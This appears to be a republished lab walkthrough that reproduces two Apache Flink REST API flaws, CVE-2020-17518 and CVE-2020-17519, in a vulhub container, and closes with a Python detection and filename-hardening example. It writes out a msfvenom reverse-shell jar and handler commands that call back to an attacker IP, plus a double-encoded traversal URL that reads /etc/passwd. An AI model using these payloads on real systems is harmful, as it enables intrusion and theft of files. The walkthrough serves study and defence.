
Example Analysis of Apache Flink vulnerability recurrence

2025-02-24 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This article walks through reproducing two Apache Flink vulnerabilities. It has some reference value for interested readers, and I hope you gain something from it.

Brief introduction

Apache Flink is an efficient, distributed, general-purpose data processing platform: an open source stream processing framework developed by the Apache Software Foundation, whose core is a distributed streaming dataflow engine written in Java and Scala (put simply, it is similar to Spark). Flink has a monitoring API that can be used to query the status and statistics of running jobs and of recently completed jobs. This monitoring API is used by Flink's own dashboard and can also be used by custom monitoring tools. By default it listens on port 8081.

This article is a practical exercise from the course "Network Security Events" (the course consists of test environments that simulate influential security events. Besides past security events, it also keeps up with current events and adds the latest ones, so that everyone can understand them and know how to protect themselves as early as possible.)

The monitoring API is a RESTful API: it accepts HTTP requests and responds with data in JSON format.

One endpoint of the monitoring API is /jars/upload, which uploads a jar to the cluster. The jar must be sent as multipart data. Make sure the "Content-Type" header is set to "application/x-java-archive", because some HTTP libraries do not add the header by default. Jar files can be uploaded via curl:

curl -X POST -H "Expect:" -F "jarfile=@path/to/flink-job.jar" http://hostname:port/jars/upload

Overview

The REST API was introduced in Flink 1.5.1, but several flaws in its implementation result in an arbitrary file read (CVE-2020-17519) and an arbitrary file write (CVE-2020-17518) vulnerability.

CVE-2020-17518: using the REST API, an attacker can modify an HTTP header and write the uploaded file to any location on the local file system (accessible by the Flink 1.5.1 process).

CVE-2020-17519: Apache Flink 1.11.0 allows an attacker to read any file on the JobManager's local file system (accessible by the JobManager process) through the REST API of the JobManager process.

Affected versions

CVE-2020-17518: Apache Flink 1.5.1 - 1.11.2

CVE-2020-17519: Apache Flink 1.11.0, 1.11.1, 1.11.2

Environment building

Because the affected ranges of both vulnerabilities include 1.11.2, that version is used for reproduction.

The vulhub environment is used here. Create a new docker-compose.yml:

version: '2'
services:
  flink:
    image: vulhub/flink:1.11.2
    command: jobmanager
    ports:
      - "8081:8081"
      - "6123:6123"

Start the environment with docker-compose. The following command downloads the image and starts a container from it, exposing ports 8081 and 6123:

docker-compose up -d

Then visit http://ip:8081

Vulnerability reproduction

Arbitrary file upload reproduction (CVE-2020-17518):

Apache Flink 1.5.1 introduced a REST handler that allows an uploaded file to be written to any location on the local file system by means of a maliciously modified HTTP header.

Visit http://ip:8081, find "Add New" under "Submit New Job" and upload a jar package. To make a jar package, create a zip archive on the desktop and rename the .zip suffix to .jar, then capture the upload request.

The request packet captured is as follows:

Send the request to the Repeater module for modification. In this example I create a new file under the /tmp directory; the ../ sequences make it easy to change directory, because we do not know what the current working directory is, so ../ is used to climb to the root directory.

Check whether the file was written successfully. List the containers:

docker ps

Enter the container:

docker exec -it CONTAINER_ID /bin/bash

You can see that the file was uploaded successfully.

Flink itself has no authentication and supports uploading and executing any jar package, so a jar package can be uploaded to get a shell.

Generate a payload in jar format

lhost is the IP of the Kali machine, lport is the port on which Kali receives the shell:

msfvenom -p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234 -f jar > /home/a.jar

Start msf to receive the shell:

msfconsole

use exploit/multi/handler

set payload java/shell_reverse_tcp

set LHOST 192.168.74.142

set LPORT 1234

exploit

After uploading the jar package, click the uploaded package and then Submit.

A shell is obtained.

Arbitrary file read (CVE-2020-17519) reproduction:

Changes introduced in Apache Flink 1.11.0 (also released in 1.11.1 and 1.11.2) allow an attacker to read any file on the JobManager's local file system through the REST interface of the JobManager process. Access is limited to files that the JobManager process itself can read.

For example, here I read the passwd file under /etc/; %252f is / URL-encoded twice.

http://192.168.74.134:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
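As an added, defender-side example (not code from this article or from the Flink project), the following Python flags the double-encoded /jobmanager/logs/ traversal pattern above in constructed access-log lines, and shows a hardened treatment of the multipart upload filename that CVE-2020-17518 misused; the log line format, the sample addresses and the function names are assumptions.

```python
import re
from posixpath import basename, normpath
from urllib.parse import unquote
# Constructed sample access-log lines (not real captures): line 1 carries the
# double-encoded traversal from the article, line 4 a differently encoded one.
SAMPLE_LOG = """\
10.0.0.5 - - "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200
10.0.0.5 - - "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200
10.0.0.9 - - "POST /jars/upload HTTP/1.1" 200
10.0.0.5 - - "GET /jobmanager/logs/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404
"""
LOGS_PREFIX = "/jobmanager/logs/"
REQ_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/')

def fully_decode(value: str, max_rounds: int = 5) -> str:
    # Decode until stable so %252f ('/' encoded twice) and %2e%2e ('..') are
    # both normalised before any path check is made.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_logs_dir(path: str) -> bool:
    # CVE-2020-17519 pattern: a /jobmanager/logs/<name> request whose decoded
    # name resolves outside the logs directory.
    decoded = fully_decode(path.split("?", 1)[0])
    if not decoded.startswith(LOGS_PREFIX):
        return False
    return len(decoded) > len(LOGS_PREFIX) and not normpath(decoded).startswith(LOGS_PREFIX)

def flag_traversal_requests(log_text: str) -> list:
    # Return (client_ip, decoded_path) for every matching log line.
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m and escapes_logs_dir(m.group("path")):
            hits.append((line.split()[0], fully_decode(m.group("path"))))
    return hits

def confine_upload_name(filename: str) -> str:
    # Hardened handling of the multipart filename (the CVE-2020-17518 input):
    # accept only a bare file name; any directory component or traversal that
    # survives decoding is rejected instead of being written to as given.
    decoded = fully_decode(filename).replace("\\", "/")
    name = basename(decoded)
    if decoded != name or name in ("", ".", ".."):
        raise ValueError(f"rejected upload filename: {filename!r}")
    return name
```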

Thank you for reading this article carefully. I hope "Example Analysis of Apache Flink vulnerability recurrence" has been helpful to you.
